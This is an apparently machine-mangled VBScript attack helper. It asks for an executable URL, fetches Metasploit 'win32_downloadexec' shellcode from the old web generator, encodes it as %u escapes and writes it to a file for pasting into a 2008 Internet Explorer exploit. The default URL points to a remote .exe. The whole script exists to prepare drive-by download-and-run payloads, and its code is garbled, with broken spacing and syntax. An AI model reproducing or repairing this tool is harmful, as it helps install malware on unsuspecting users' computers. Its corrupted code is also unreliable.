'Code by LCX
On Error resume next
Exeurl = inputbox ("Enter the EXE address:", "enter", "http://www.haiyangtop.net/333.exe ")
Url = "http://www.metasploit.com: 55555/payloads? Parent = glob % 280x25bfa38% 29 & module = win32_downloadexec & mode = generate & opt_url = "& urlencoding (exeurl) & "& maxsize = & badchars = 0x00 + & encoder = default & Action = generate + payload"
Body = gethttppage (URL)
Set Re = new Regexp
Re. pattern = "(\ $ shellcode \ = [\ s] + </div> </PRE> )"
Set matches = Re. Execute (Body)
If matches. Count> 0 then body = matches (0). Value
Code = trim (replace (body, "$ shellcode =", ""), CHR (34 ),""), CHR (13), ""), ";", ""), "</div> </PRE>", ""), CHR (10 ), ""),". ",""))
Function replaceregex (STR)
Set RegEx = new Regexp
RegEx. pattern = "\ x (..)"
RegEx. ignorecase = true
RegEx. Global = true
Matches = RegEx. Replace (STR, "% u $2 $1 ")
Replaceregex = matches
End Function
Function gethttppage (PATH)
T = getbody (PATH)
Gethttppage = bytestobstr (T, "gb2312 ")
End Function
Function getbody (URL)
On Error resume next
Set retrieval = Createobject ("Microsoft. XMLHTTP ")
With Retrieval
. Open "get", URL, false ,"",""
. Send
Getbody =. responsebody
End
Set retrieval = nothing
End Function
Function bytestobstr (body, cset)
Dim objstream
Set objstream = Createobject ("ADODB. Stream ")
Objstream. type = 1
Objstream. mode = 3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. type = 2
Objstream. charset = cset
Bytestobstr = objstream. readtext
Objstream. Close
Set objstream = nothing
End Function
Function urlencoding (vstrin)
Strreturn = ""
For AAAA = 1 to Len (vstrin)
Thischr = mid (vstrin, AAAA, 1)
If ABS (ASC (thischr) <& HFF then
Strreturn = strreturn & thischr
Else
Innercode = ASC (thischr)
If innercode <0 then
Innercode = innercode + & h10000
End if
Hight8 = (innercode and & hff00) \ & HFF
Low8 = innercode and & HFF
Strreturn = strreturn & "%" & hex (hight8) & "%" & hex (low8)
End if
Next
Urlencoding = strreturn
End Function
Set FSO = Createobject ("scripting. FileSystemObject ")
Set files = FSO. opentextfile ("a.txt", 2, true)
Files. writeline replaceregex (CODE)
'Files. writeline body
Wscript. Echo replaceregex (CODE)
Files. Close
Set FSO = nothing
Wscript. Echo CHR (13) & "OK ,generate a.txt. Replace http://milw0rm.com/sploits/2008-iesploit.tar.gzwith the shellcode1content in a.txt"